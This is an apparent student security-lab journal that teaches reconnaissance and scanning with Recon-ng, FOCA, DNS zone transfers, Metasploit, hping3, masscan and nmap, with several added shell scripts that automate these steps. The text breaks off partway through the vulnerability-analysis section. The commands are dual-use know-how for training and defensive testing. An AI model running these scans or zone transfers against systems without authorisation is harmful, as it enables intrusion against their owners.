Security Breaches: Tools & Countermeasures

The document provides a comprehensive guide on various tools and techniques for performing security assessments, including footprinting, reconnaissance, network scanning, enumeration, vulnerability analysis, and system hacking. It details specific tools like Recon-ng, FOCA, Metasploit, and Nmap, along with instructions for their usage. Additionally, it covers methods for web application security, cryptography, and countermeasures against security breaches.


IT Sem III Security Breaches and Countermeasures Journal

INDEX

Practical 1
a. Use the following tools to perform footprinting and reconnaissance
   i. Recon-ng (Using Kali Linux)
   ii. FOCA Tool
   iii. Windows Command Line Utilities
      • Ping
      • Tracert using Ping
      • Tracert
      • NSLookup
   iv. Website Copier Tool – HTTrack
   v. Metasploit (for information gathering)
   vi. Whois Lookup Tools for Mobile – DNS Tools, Whois, Ultra Tools Mobile
   vii. Smart Whois
   viii. eMailTracker Pro
   ix. Tools for Mobile – Network Scanner, Fing – Network Tool, Network Discovery Tool, Port Droid Tool
b. Scan the network using the following tools:
   i. Hping2 / Hping3
   ii. Advanced IP Scanner
   iii. Angry IP Scanner
   iv. Masscan
   v. NEET
   vi. CurrPorts
   vii. Colasoft Packet Builder
   viii. The Dude

Practical 2
a. Use Proxy Workbench to see the data passing through it and save the data to file.
b. Perform Network Discovery using the following tools:
   i. SolarWinds Network Topology Mapper
   ii. OpManager
   iii. NetworkView
   iv. LANState Pro
c. Use the following censorship circumvention tools:
   i. Alkasir
   ii. Tails OS
d. Use Scanning Tools for Mobile – Network Scanner, Fing – Network Tool, Network Discovery Tool, Port Droid Tool

Practical 3
a. Perform Enumeration using the following tools:
   i. Nmap
   ii. NetBIOS Enumeration Tool
   iii. SuperScan Software
   iv. Hyena
   v. SoftPerfect Network Scanner Tool
   vi. OpUtils
   vii. SolarWinds Engineer’s Toolset
   viii. Wireshark
b. Perform the vulnerability analysis using the following tools:
   i. Nessus
   ii. OpenVAS

Practical 4
a. Perform mobile network scanning using Nessus
b. Perform System Hacking using the following tools:
   i. Winrtgen
   ii. PWDump
   iii. Ophcrack
   iv. Flexispy
   v. NTFS Stream Manipulation
   vi. ADS Spy
   vii. Snow
   viii. Quickstego
   ix. Clearing Audit Policies
   x. Clearing Logs

Practical 5
a. Use Wireshark to sniff the network.
b. Use SMAC for MAC Spoofing.
c. Use Capsa Network Analyser.
d. Use OmniPeek Network Analyzer.

Practical 6
a. Use the Social Engineering Toolkit on Kali Linux to perform Social Engineering.
b. Perform a DDoS attack using the following tools:
   i. HOIC
   ii. LOIC
   iii. HULK
   iv. Metasploit
c. Use Burp Suite to inspect and modify traffic between the browser and the target application.

Practical 7
a. Perform Web App Scanning using OWASP Zed Attack Proxy.
b. Use DroidSheep on mobile for session hijacking.
c. Demonstrate the use of the following firewalls:
   i. ZoneAlarm, and analyse using Firewall Analyzer.
   ii. Comodo Firewall
d. Use HoneyBOT to capture malicious network traffic.
e. Use the following tools to protect web servers against attacks:
   i. ID Serve
   ii. Microsoft Baseline Security Analyzer
   iii. Syhunt Hybrid

Practical 8
a. Protect the Web Application using dotDefender.
b. Demonstrate the following tools to perform SQL Injection:
   i. Tyrant SQL
   ii. Havij
   iii. BBQSQL

Practical 9
Use the Aircrack-ng suite for wireless hacking and countermeasures.

Practical 10
Use the following tools for cryptography:
   i. HashCalc
   ii. Advanced Encryption Package
   iii. TrueCrypt
   iv. CrypTool

Practical No. 1
A. Tools to perform footprinting and reconnaissance
Footprinting and reconnaissance collect basic information about the target systems before any attempt to exploit them. The information gathered includes IP addresses and their location, routing information, business information, postal address, phone numbers and DNS records.
i. Recon-ng (Using Kali Linux)
Recon-ng is a full-featured web reconnaissance framework used for information gathering and network detection. It is written in Python, built from independent modules, and stores everything it collects in a workspace database. It is open source, ships with Kali Linux, and can be downloaded from [Link].
1- Run the Recon-ng application, or open a terminal in Kali Linux, type recon-ng and press Enter.

2- Enter the command “show modules” to list all available modules.

3- You can search for a module by name. For example, in the figure above the command “search netcraft” is used.

4- To load the Netcraft module, enter “use recon/domains-hosts/netcraft” and press Enter.

5- Set the target domain with “set SOURCE [domain]” and press Enter. Type run and press Enter to execute the module; the host names it discovers are written to the hosts table of the workspace and can be listed with “show hosts”. (In Recon-ng 5 the equivalent commands are “modules search”, “modules load” and “options set SOURCE”.)


ii. FOCA Tool

FOCA stands for Fingerprinting Organizations with Collected Archives. It finds metadata and other hidden information in documents that an organisation has published on its web pages; the documents found can be downloaded and analysed. FOCA supports many document types, including OpenOffice, Microsoft Office, Adobe InDesign, PDF and SVG, and locates them through three search engines: Google, Bing and DuckDuckGo.

1- Download FOCA from [Link] and run it. Go to Project > New Project.

2- Enter the Project name, Domain website, Alternate website (if required), the Directory to save the results in, and the Project date. Click Create to proceed.

3- Select the search engines, file extensions and other parameters as required, then click the Search All button.

4- Once the search completes, the results pane lists the files found. Select a file, download it and extract its metadata to gather information such as user names and file creation and modification dates.


iii. Windows Command Line Utilities

Consider a network where you have access to a Windows PC connected to the Internet. Using the tools built into Windows, we gather some information about the target. Any target domain or IP address can be used; in our case the target is [Link].

Topology Diagram:

• Ping
1- Open Windows Command Line (cmd) from Windows PC

2- Enter the command “ping [Link]”.

From the output you can observe and extract the following information:
 [Link] is live (it answers ICMP Echo Requests)
 the IP address of [Link]
 round-trip time
 TTL value
 packet-loss statistics
3- Now enter “ping [Link] -f -l 1500” to test fragmentation: -f sets the Don’t Fragment (DF) bit and -l sets the ICMP payload size in bytes.

The output shows “Packet needs to be fragmented but DF set”, which means a 1500-byte payload (plus 28 bytes of IP and ICMP headers) exceeds the path MTU and would have to be fragmented. Let’s try again with a smaller value:


The output again shows “Packet needs to be fragmented but DF set”, which means a 1400-byte payload would also require fragmentation. Let’s try again with a smaller value:

The output again shows “Packet needs to be fragmented but DF set”, which means a 1300-byte payload would also require fragmentation. Let’s try again with a smaller value:

The output now shows replies, which means a 1200-byte payload passes without fragmentation. You can keep narrowing the value: the largest payload that still gets a reply, plus 28 bytes of headers, is the path MTU.
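The manual probing above can be automated. The following shell script is added here as an example and is not part of the original journal: it performs the same DF-bit ping as a binary search, so the path MTU is found in a handful of probes instead of by guessing. It assumes Linux ping (where -M do sets DF and -s sets the payload size; the Windows equivalent of one probe is ping -f -l <size> <host>), and the simulated probe with its SIM_MTU value is constructed for offline use.

```shell
#!/bin/sh
# Added example: find the path MTU by binary search over DF-set pings,
# generalising the manual 1500 -> 1400 -> 1300 -> 1200 probing above.
# Assumes Linux ping: -M do sets the DF bit, -s sets the payload size.
# (Windows equivalent of one probe: ping -f -l <size> <host>)

# probe_live SIZE HOST -> exit 0 if a DF-set ping with SIZE payload bytes is answered
probe_live() {
    ping -c 1 -W 2 -M do -s "$1" "$2" >/dev/null 2>&1
}

# probe_sim SIZE HOST -> constructed stand-in for probe_live used offline:
# pretends the path MTU is SIM_MTU, so payloads up to SIM_MTU-28 succeed
# (20 bytes IPv4 header + 8 bytes ICMP header).
SIM_MTU=${SIM_MTU:-1500}
probe_sim() {
    [ "$1" -le $((SIM_MTU - 28)) ]
}

# pmtu_search PROBE HOST LOW HIGH
# LOW must be a payload size known to succeed; HIGH the largest worth trying.
# Prints "<largest answered payload> <implied path MTU>".
pmtu_search() {
    probe=$1; host=$2; low=$3; high=$4
    while [ $((high - low)) -gt 1 ]; do
        mid=$(((low + high) / 2))
        if "$probe" "$mid" "$host"; then
            low=$mid            # fits: search upwards
        else
            high=$mid           # "needs to be fragmented": search downwards
        fi
    done
    if "$probe" "$high" "$host"; then low=$high; fi
    echo "$low $((low + 28))"
}

case "${1:-}" in
    --live) pmtu_search probe_live "$2" 0 1472 ;;   # usage: ./pmtu.sh --live <host>
    *)      pmtu_search probe_sim  none 0 1472 ;;   # offline demonstration
esac
```

The upper bound 1472 is the largest ICMP payload that fits a standard 1500-byte Ethernet MTU; raise it for jumbo-frame networks. The search needs roughly log2(1472) probes, about eleven, instead of one per guess.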

• Tracert using Ping
Enter the command “tracert [Link]” to trace the route to the target.

From the output you get the hops between the source (your PC) and the destination ([Link]), the response time of each hop, and related information.

• Tracert
Tracert is available in all common operating systems as a command-line tool (tracert on Windows, traceroute on Linux and macOS); VisualRoute and other graphical traceroute applications are also available. The command reports the path from source to destination hop by hop, listing every hop in between together with the latency to each of them.

Consider an example in which an attacker uses tracert to gather network information. From the following results the network map can be worked out.


[Link] is the first hop, which means it is the gateway. The tracert result for [Link] shows that [Link] is another interface of the first-hop device, and the connected addresses include [Link] and [Link].

[Link] is the hop before the last hop, [Link]. It may be connected either to [Link] or to [Link]. To verify, trace the next route.

[Link] is another interface of the network device [Link], which sits next to [Link]. [Link], [Link] and [Link] are connected directly to [Link].

[Link] is another interface of the network device [Link], which sits next to [Link]. [Link], [Link] and [Link] are connected directly to [Link].

Traceroute Tools
Other traceroute tools:
 Path Analyzer Pro – [Link]
 VisualRoute – [Link]
 Troute – [Link]
 3D Traceroute – [Link]
The following figure shows the graphical view and other trace information from the VisualRoute tool.

• DNS Zone Transfer Enumeration Using NSLookup
Nslookup (Name Server Lookup) is a command for querying a DNS server. It is a network administration tool for querying the Domain Name System (DNS) to obtain name-to-address or address-to-name mappings, or any other DNS record type, and it is also used to troubleshoot DNS problems.
In enumeration through DNS zone transfer, the attacker first checks whether TCP port 53 is open on the target name server, because zone transfers (AXFR) are carried over TCP port 53 by default; a port scan shows whether it is open.

A zone transfer is the process by which one DNS server passes a copy of its zone records to another DNS server, so that more than one server can answer queries for the zone. Consider a scenario in which both a primary and a secondary DNS server answer queries: the secondary obtains its copy of the records from the primary by zone transfer. A server that accepts transfer requests from any client hands the whole zone, every host name with its address, to the requester, which is why transfers should be permitted only from the addresses of the secondary servers (for example with allow-transfer in BIND).

1. Open the Windows command line (cmd), enter nslookup and press Enter.

2. The prompt changes to the “>” symbol.

3. Enter “server <DNS server name>” or “server <DNS server address>” to select the target’s name server.
4. Enter “set type=any” and press Enter to request all record types.
5. Enter “ls -d <domain>”: this requests a zone transfer and lists the records of the target domain (if the server allows it).

6. If transfers are not allowed, the request fails.

7. Linux has the dig command for the same purpose: at a prompt enter “dig @<name server> <domain> axfr”.
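As an added example (not part of the original journal), the following script automates the check from steps 3 to 7 on Linux: it asks for the authoritative name servers of a domain, attempts an AXFR against each one with dig, and reports whether the transfer was open, refused or unreachable. The domain example.com and the sample dig outputs are constructed placeholders.

```shell
#!/bin/sh
# Added example: test each authoritative name server of a domain for an open
# zone transfer; the same request as "ls -d" in nslookup or "dig ... axfr".
# Assumes dig is installed. example.com is a placeholder target.

# axfr_status DIG_OUTPUT -> prints open, refused or unreachable.
# A successful AXFR starts and ends with the zone's SOA record; BIND answers a
# refused transfer with "Transfer failed."; dig reports network problems as
# "connection timed out" or "communications error".
axfr_status() {
    out=$1
    if printf '%s\n' "$out" | grep -qE 'Transfer failed|connection refused'; then
        echo refused
    elif printf '%s\n' "$out" | grep -qiE 'timed out|communications error'; then
        echo unreachable
    elif [ "$(printf '%s\n' "$out" | grep -c '[[:space:]]SOA[[:space:]]')" -ge 2 ]; then
        echo open
    else
        echo refused
    fi
}

# record_count DIG_OUTPUT -> number of resource records in a transfer
# (dig prefixes comments with ';', every other non-empty line is a record)
record_count() {
    printf '%s\n' "$1" | grep -c '^[^;]'
}

# check_zone DOMAIN -> one line per name server: "<ns> <status> <records>"
check_zone() {
    domain=$1
    for ns in $(dig +short NS "$domain"); do
        out=$(dig +time=3 +tries=1 "@$ns" "$domain" AXFR 2>&1)
        echo "$ns $(axfr_status "$out") $(record_count "$out")"
    done
}

# Constructed dig outputs (not real captures) used to exercise the parser offline.
SAMPLE_OPEN='; <<>> DiG 9.18.0 <<>> @ns1.example.com example.com AXFR
example.com.      3600  IN  SOA  ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
example.com.      3600  IN  NS   ns1.example.com.
www.example.com.  300   IN  A    192.0.2.10
example.com.      3600  IN  SOA  ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
;; Query time: 12 msec'
SAMPLE_REFUSED='; <<>> DiG 9.18.0 <<>> @ns1.example.com example.com AXFR
; Transfer failed.'

if [ -n "${1:-}" ]; then check_zone "$1"; fi     # usage: ./axfr_check.sh example.com
```

Every authoritative server is tested separately because a zone is only as protected as its least restricted server: a secondary that still allows transfers from anyone leaks the zone even when the primary is locked down.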

iv. Website Copier tool (HTTrack)

1- Download and install the WinHTTrack Website Copier tool from [Link]. The website lists the platforms HTTrack supports, such as Windows, Linux and Android.

2- HTTrack Website Copier tool installation.


3- Click Next

4- Enter a Project name, as in our case, Testing_Project.


5- Click on Set Options button.

6- Go to Scan Rules Tab and Select options as required.


7- Enter the Web Address in the field and Click Next.

8- Click Next.


9- Click Browse Mirrored Website.

10- Select your favorite web browser.

Observe the output above: the [Link] website has been copied into a local directory and is being browsed from there. You can now explore the site offline to study its structure and other parameters.

To verify, compare the copy with the original [Link] website: open a new tab and go to [Link].

v. Metasploit (for information gathering)

In this lab we use the Metasploit Framework, installed by default in Kali Linux, to gather more information about the hosts on a network. Metasploit is a powerful tool that is widely used for scanning and information gathering as well as for exploitation. The commercial Metasploit Pro additionally automates discovery and exploitation and provides the tools for the manual testing phase of a penetration test: scanning for open ports and services, exploiting vulnerabilities, pivoting further into a network, collecting evidence and reporting the results.

Topology information: in this lab the Metasploit Framework runs on the private network [Link]/24, where several hosts are live, including Windows 7, Kali Linux and Windows Server 2016.

1- Open Kali Linux and Run Metasploit Framework.


2- Metasploit Framework initialization as shown below in the figure.

msf > hosts


Observe the os_flavor column: the SMB version scanner (auxiliary/scanner/smb/smb_version) identifies the operating system flavor of every host in the configured RHOSTS range and records it in the hosts table.
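The steps shown in the screenshots above can be scripted. The following shell function is added here as an example rather than taken from the journal: it writes a Metasploit resource script that discovers hosts into the database, runs the SMB version scanner to populate os_flavor, and prints the hosts table. It assumes msfconsole with an initialised database, and the subnet 192.168.0.0/24 in the usage line is a placeholder for the lab network.

```shell
#!/bin/sh
# Added example: script the information-gathering run shown above as a
# Metasploit resource file and execute it non-interactively.
# Assumes msfconsole with its database initialised (msfdb init).
# The subnet given on the command line is a placeholder for the lab network.

# write_msf_rc SUBNET FILE -> writes the resource script to FILE
# Steps: new workspace, ping sweep into the db (db_nmap), SMB version scan
# (fills os_name/os_flavor), then print the hosts and SMB services found.
write_msf_rc() {
    subnet=$1; file=$2
    cat > "$file" <<EOF
workspace -a lab
db_nmap -sn $subnet
use auxiliary/scanner/smb/smb_version
set RHOSTS $subnet
set THREADS 16
run
hosts -c address,os_name,os_flavor
services -p 445 -u
exit
EOF
}

# rc_commands FILE -> number of commands in the resource script
rc_commands() { grep -c . "$1"; }

if [ -n "${1:-}" ]; then              # usage: ./msf_recon.sh 192.168.0.0/24
    write_msf_rc "$1" /tmp/recon.rc
    msfconsole -q -r /tmp/recon.rc
fi
```

Keeping the scan in a resource file makes the lab repeatable and leaves every result in the workspace database, so later modules can take their targets from hosts and services instead of from typed addresses.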

vi. Whois Lookup Tools for Mobile – DNS Tools, Whois, Ultra Tools Mobile

WHOIS provides information about a domain name: ownership, IP address, netblock data, domain name servers and more. The Regional Internet Registries (RIRs) maintain the WHOIS databases for IP address allocations, and the domain registries and registrars maintain them for domain names. A WHOIS lookup helps to find out who is behind the target domain name.

1. Go to the URL [Link].

2. Search for the target domain.


WHOIS Lookup Result Analysis

The lookup result shows the complete domain profile, including:
 Registrant information
 Registrant organisation
 Registrant country
 Domain name server information
 IP address
 IP location
 ASN
 Domain status
 WHOIS history
 IP history
 Registrar history
 Hosting history
It also includes the e-mail and postal addresses of the registrar and the administrative contact, with contact details. Note that many registries now redact registrant contact fields for privacy, so those entries often read “REDACTED FOR PRIVACY”. You can go to [Link] and enter the target URL to obtain the WHOIS lookup information.


vii. Smart Whois

You can download the SmartWhois software from [Link] for WHOIS lookups, as shown in the figure below:

viii. eMailTracker Pro

eMailTrackerPro is a Windows-based e-mail tracing tool that can be used to monitor employees, senders and recipients. It can be used in conjunction with other programs, such as Windows Nuke (also known as Spamwasher), to identify quickly where a computer has been and how it has been used.

Click Trace Headers (or Trace email address), paste the message header and click OK. The status of the trace is shown under Trace Reports.

ix. Tools for Mobile – Network Scanner, Fing – Network Tool, Network
Discovery Tool, Port Droid Tool


b. Scan the network using the following tools:

i. Hping2 / Hping3
Hping is a command-line TCP/IP packet assembler and analyser. It sends customised TCP/IP packets and displays the target’s replies, much as ping displays the ICMP Echo Reply from a host. Hping also handles fragmentation, arbitrary packet bodies and sizes, and file transfer, and it supports TCP, UDP, ICMP and raw IP. With hping the following can be performed:
 Testing firewall rules
 Advanced port scanning
 Testing network performance
 Path MTU discovery
 Transferring files even through restrictive firewall rules
 Traceroute-like probing under different protocols
 Remote OS fingerprinting, and more

In this lab we use hping3 on Kali Linux to send different customised packets to a Windows 7 host.

 To send an ACK packet:

root@kali:~# hping3 -A [Link]

 To run a SYN scan against a range of ports (scan mode):

root@kali:~# hping3 -8 1-600 -S [Link]

 To send a packet with the FIN, PSH and URG flags set (an Xmas probe):

root@kali:~# hping3 -F -P -U [Link]

Without -p hping3 addresses port 0; add -p <port> to probe a specific port and -c <count> to stop after a given number of packets. hping3 must run as root because it writes raw packets.
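Reading hping3’s replies is the point of the probes above, so the following script (an added example, not part of the journal) classifies each reply line by its TCP flags: SYN/ACK to a SYN probe means the port is open, RST/ACK means it is closed, RST to an ACK probe means no stateful filter is in the way, and no reply means a firewall is dropping the probe. The target address and the sample reply lines are constructed, and the format is the one hping3 prints in its normal (non -8) mode, e.g. hping3 -S -p 445 -c 1 <target>.

```shell
#!/bin/sh
# Added example: classify hping3 replies by TCP flags, the way the probes
# above are read by hand. hping3 prints one line per reply in its normal
# (non -8) mode, e.g. from "hping3 -S -p 445 -c 1 <target>":
#   len=46 ip=192.168.0.10 ttl=128 DF id=0 sport=445 flags=SA seq=0 win=8192 rtt=0.9 ms
# The address and the sample lines below are constructed, not captured.

# classify_reply LINE [PROBE] -> open | closed | unfiltered | filtered | unknown
# PROBE is the flag we sent: S (SYN scan, default) or A (ACK firewall test).
#   SYN probe:  flags=SA (SYN/ACK) = open,  flags=RA (RST/ACK) = closed
#   ACK probe:  flags=R  (RST)     = unfiltered (no stateful firewall in path)
#   reply without TCP flags (e.g. ICMP unreachable) = filtered; no reply at
#   all is also filtered, but then hping3 prints nothing to classify.
classify_reply() {
    line=$1; probe=${2:-S}
    flags=$(printf '%s\n' "$line" | sed -n 's/.*flags=\([A-Z]*\).*/\1/p')
    case "$probe$flags" in
        SSA)  echo open ;;
        SRA)  echo closed ;;
        AR)   echo unfiltered ;;
        S|A)  echo filtered ;;
        *)    echo unknown ;;
    esac
}

# summarize_scan [PROBE] < hping3_output -> "sport state" for every reply line
summarize_scan() {
    probe=${1:-S}
    while IFS= read -r line; do
        port=$(printf '%s\n' "$line" | sed -n 's/.*sport=\([0-9]*\).*/\1/p')
        [ -n "$port" ] || continue          # skip banner/statistics lines
        echo "$port $(classify_reply "$line" "$probe")"
    done
}

# Constructed sample: replies to SYN probes of ports 445 and 22 on one host;
# a third probe (port 80) drew no reply at all, which hping3 does not print.
SAMPLE='HPING 192.168.0.10 (eth0 192.168.0.10): S set, 40 headers + 0 data bytes
len=46 ip=192.168.0.10 ttl=128 DF id=0 sport=445 flags=SA seq=0 win=8192 rtt=0.9 ms
len=46 ip=192.168.0.10 ttl=128 DF id=0 sport=22 flags=RA seq=1 win=0 rtt=1.1 ms

--- 192.168.0.10 hping statistic ---
3 packets transmitted, 2 packets received, 33% packet loss'

# live use (needs root): hping3 -S -p 445 -c 1 <target> | summarize_scan
printf '%s\n' "$SAMPLE" | summarize_scan
```

The ACK probe is the firewall test listed among hping’s uses: a stateless packet filter lets a bare ACK through and the host answers RST, while a stateful firewall drops it because it belongs to no known connection.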


ii. Advanced IP Scanner


Advanced IP Scanner is a fast and powerful network scanner with a user-friendly interface.
In seconds, Advanced IP Scanner can locate all computers on your wired or wireless local
network and scan their ports. The program provides easy access to various network resources
such as HTTP, HTTPS, FTP, and shared folders.

iii. Angry IP Scanner

Angry IP Scanner (or simply ipscan) is an open-source, cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports and has many other features.

It is widely used by network administrators and curious users around the world, including large and small enterprises, banks and government agencies.

It runs on Linux, Windows and Mac OS X, and possibly on other platforms as well.

iv. Masscan
MASSCAN is a TCP port scanner that transmits SYN packets asynchronously and produces results similar to those of nmap, the best-known port scanner. Internally it works more like scanrand, unicornscan and ZMap, using asynchronous transmission, and it accepts arbitrary address and port ranges. Because it can send packets far faster than most networks and hosts tolerate, the --rate option should be set to a value the target network can absorb.
Scan a selection of ports (-p22,80,445) across a given subnet ([Link]/24):

root@kali:~# masscan -p22,80,445 [Link]/24

Starting masscan 1.0.3 ([Link]) at 2014-05-13 21:35:12 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [3 ports/host]
Discovered open port 22/tcp on [Link]
Discovered open port 445/tcp on [Link]
Discovered open port 80/tcp on [Link]
v. NEET
Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and coordinates numerous other open-source network tools with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. It therefore sits somewhere between running your own port scans and follow-up tests by hand and running a fully automated vulnerability assessment (VA) tool. Its many options let the user tune the test parameters for network scanning in the most efficient and practical way.

vi. CurrPorts
Case study: using the previous lab, we re-execute the HTTP Remote Access Trojan (RAT) on the Windows Server 2016 machine ([Link]) and observe its TCP/IP connections in order to detect and kill the connection.

Topology:

Configuration:
1. Run the CurrPorts application on Windows Server 2016 and observe the listed processes.


2. Run the HTTP Trojan created in the previous lab.

The new process is added to the list.

You can observe the process name, protocol, local and remote port and IP address information.
3. For more detail, right-click on [Link] and go to Properties.


The Properties window shows more details about the TCP connection.

4. Go to the Windows 7 machine and initiate the connection with a web browser, as described in the previous lab.

The connection is established successfully.

5. Back on Windows Server 2016, kill the connection (right-click the connection and choose Close Selected TCP Connections).


6. To verify, try to re-establish the connection from Windows 7.

vii. Colasoft Packet Builder

Colasoft Packet Builder lets you create customised network packets. Such packets can be used to probe a network and to craft attack traffic, and the customisation can also produce fragmented packets. You can download the software from [Link].


Colasoft Packet Builder offers Import and Export options for sets of packets. You can add a new packet by clicking the Add button and selecting the packet type from the drop-down list. The available types are:
 ARP packet
 IP packet
 TCP packet
 UDP packet

After selecting the packet type you can customise the packet’s fields, select the network adapter and send it towards the destination.

viii. The Dude

The Dude network monitor is an application by MikroTik that can dramatically improve the way you manage your network environment. It automatically scans all devices within the specified subnets, draws and lays out a map of your networks, monitors the services on your devices and alerts you when a service has problems.

Main Features:

 Auto network discovery and layout


 Discovers any type or brand of device
 Device, Link monitoring, and notifications
 Includes SVG icons for devices, and supports custom icons and backgrounds
 Easy installation and usage
 Allows you to draw your own maps and add custom devices
 Supports SNMP, ICMP, DNS and TCP monitoring for devices that support it
 Individual Link usage monitoring and graphs
 Direct access to remote control tools for device management
 Supports remote Dude server and local client


Practical No. 2
a. Use Proxy Workbench to see the data passing through it and save the data to file.
Proxy Workbench is a proxy server aimed at developers, trainers and security experts that displays the data passing through it in real time. You can see the data flowing between your e-mail client and the e-mail server or between web browser and web server, and analyse FTP in both passive and active modes. In addition, the “pass through” protocol handler enables analysis of other protocols by relaying their traffic unchanged.

Its animated connection diagram graphically represents the history of each socket connection and lets you drill down to the finest detail; the animation can be exported to HTML and saved for the web.

b. Perform Network Discovery using the following tools:


i. SolarWinds Network Topology Mapper
SolarWinds Network Topology Mapper (NTM) shows the nodes on your network and indicates and updates the status of both the nodes and the network connections between them, in interrelated, scalable maps with customisable icons.


ii. OpManager
OpManager is an advanced network monitoring tool that offers fault management for WAN links, routers, switches, VoIP and servers, and also performs performance management.

iii. NetworkView

NetworkView is a network visualisation tool that provides a simple interface to the complex functions involved in discovering and monitoring multi-vendor IP networks. With NetworkView you get a quick overview of your network, whether it is a small office or a corporate network. Version 3 adds functions oriented to network management tasks.

NetworkView uses multiple methods, such as ICMP, mDNS, SSDP, DNS, NetBIOS, SNMP MIB-2, Bridge MIB, LLDP, CDP and proprietary MIBs, to discover devices, and generates a graphical representation of your network. It produces views of both the logical and the physical network structure, and also displays the virtual structure of wireless systems (Cisco, Aruba/Alcatel-Lucent and Fortinet).

iv. LANState Pro

LANState is a simple network topology mapping, host monitoring and management program. It monitors service availability and makes it easier to manage servers, computers, switches and other devices from the graphical map, with quick access to device properties, RDP and web UIs.


c. Use the following censorship circumvention tools:

i. Alkasir
Alkasir was created to bypass restrictions imposed by ISPs, “to allow users to access information about their countries and regions that are concealed by the states mainly because of political reasons”.

ii. Tails OS
Tails, which stands for The Amnesic Incognito Live System, is an open-source, security- and privacy-focused live operating system; it routes all traffic through Tor and leaves no trace on the computer it runs on. It is used by journalists, activists and others to keep their digital activity safe and anonymous, so it is important to obtain it from a trustworthy source and to verify the download.


d. Use Scanning Tools for Mobile – Network Scanner, Fing – Network Tool, Network Discovery Tool, Port Droid Tool
Several basic and advanced network tools are available for mobile devices from the application stores. The following are some effective tools for network scanning.


Practical No. 3
a. Perform Enumeration using the following tools:
i. Nmap
Nmap is a powerful networking tool that supports many features and commands. Its operating system detection sends a series of TCP, UDP and ICMP probes and examines the responses from the target host; a detailed assessment of these responses (TCP sequence behaviour, window sizes, IP ID and TTL values) gives clues to the nature of the operating system and reveals its type. To perform OS detection with nmap, run (as root, since it needs raw sockets):
nmap -O <ip address>

ii. NetBIOS Enumeration Tool

NetBIOS stands for Network Basic Input Output System. It allows computers to communicate over a LAN and to share files and printers. NetBIOS names identify network devices over TCP/IP (on Windows); the NetBIOS name service listens on UDP port 137, and a null session over SMB (TCP 139/445) is the usual way to enumerate names, shares and users.

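Both of the steps above (nmap OS detection and NetBIOS enumeration) can be run in a single nmap invocation using its nbstat and smb-os-discovery scripts. The following script is an added example, not the journal’s own: enum_hosts runs that scan and summarize_grepable reduces nmap’s grepable (-oG) output to one line per host with its OS guess and open ports. The target range and the sample output are constructed placeholders.

```shell
#!/bin/sh
# Added example: nmap OS detection plus NetBIOS/SMB enumeration in one run,
# reduced to one line per host. Assumes nmap with its bundled nbstat and
# smb-os-discovery scripts; the target range is a placeholder and the sample
# grepable output below is constructed, not a real capture.

# enum_hosts TARGETS... -> OS detection, service versions and NetBIOS scripts,
# in grepable (-oG) form on stdout. Needs root for -O.
enum_hosts() {
    nmap -O -sV -p 139,445 --script nbstat,smb-os-discovery -oG - "$@"
}

# summarize_grepable < nmap_-oG_output -> "<host> <os> <open ports>" per host
# Grepable host lines are tab-separated fields, e.g.
#   Host: 192.168.0.10 ()<TAB>Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///<TAB>OS: Microsoft Windows 7
summarize_grepable() {
    awk -F'\t' '/^Host:/ {
        host = ""; os = "-"; open = ""
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^Host:/)  { split($i, a, " "); host = a[2] }
            if ($i ~ /^OS:/)    { os = substr($i, 5) }
            if ($i ~ /^Ports:/) {
                n = split(substr($i, 8), plist, ", ")
                for (j = 1; j <= n; j++) {
                    split(plist[j], f, "/")           # port/state/proto/...
                    if (f[2] == "open") open = (open == "") ? f[1] : open "," f[1]
                }
            }
        }
        if (open != "") print host, os, open          # hosts with nothing open are dropped
    }'
}

# Constructed sample output (two hosts: one with SMB open, one with both ports closed).
SAMPLE=$(printf '# Nmap 7.94 scan initiated (constructed sample)\nHost: 192.168.0.10 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows 7\nHost: 192.168.0.20 ()\tPorts: 139/closed/tcp//netbios-ssn///, 445/closed/tcp//microsoft-ds///\tOS: Linux 5.X\n')

# live use: enum_hosts 192.168.0.0/24 | summarize_grepable
printf '%s\n' "$SAMPLE" | summarize_grepable
```

The grepable format is used because it keeps each host on one line; the script output (NetBIOS name, workgroup, SMB OS string) is only in the normal or XML output, so for the full detail run the same command with -oX and parse that instead.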

iii. SuperScan
SuperScan is a multi-functional tool that helps you manage your network and make sure that your connections and TCP ports are working as they should. One of its main advantages is speed: its scans complete faster than those of most other scanning tools.

iv. Hyena
Hyena is a GUI-based NetBIOS enumeration tool that shows shares, user login information and other related details.

v. SoftPerfect Network Scanner Tool

SoftPerfect Network Scanner can ping computers, scan ports, discover shared folders and retrieve practically any information about network devices via WMI, SNMP, HTTP, SSH and PowerShell.


vi. OpUtils
OpUtils is an IP address and switch port management tool geared towards helping engineers efficiently monitor, diagnose and troubleshoot IT resources. It complements existing management tools with troubleshooting and real-time monitoring capabilities.


vii. SolarWinds Engineer’s Toolset

Engineer’s Toolset provides the tools a network engineer or consultant needs to get the job done. The toolset includes diagnostic, performance and bandwidth measurement utilities.

viii. Wireshark
Wireshark is a free and open-source packet analyser. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, the project was renamed Wireshark in May 2006 due to trademark issues.

b. Perform the vulnerability analysis using the following tools:

i. Nessus
Nessus is a proprietary vulnerability scanner developed by Tenable, Inc.; it was open source until Tenable closed the source with version 3 in 2005. [Link] is Tenable’s subscription-based cloud service, which absorbed what was previously known as Nessus Cloud, Tenable’s Software-as-a-Service offering. Nessus reports its findings with Common Vulnerabilities and Exposures (CVE) identifiers, which makes cross-referencing with other CVE-compatible security tools straightforward. It is one of the most widely used vulnerability scanners in vulnerability assessments and penetration testing engagements, and attackers use it as well. In short, Nessus checks computers for vulnerabilities that an attacker could exploit; a finding is a candidate that still has to be verified, since the scanner infers most issues from version banners and responses rather than by exploiting them.


ii. OpenVas

OpenVAS is a full-featured vulnerability scanner. Its capabilities include unauthenticated and


authenticated testing, various high-level and low-level internet and industrial protocols,
performance tuning for large-scale scans and a powerful internal programming language to
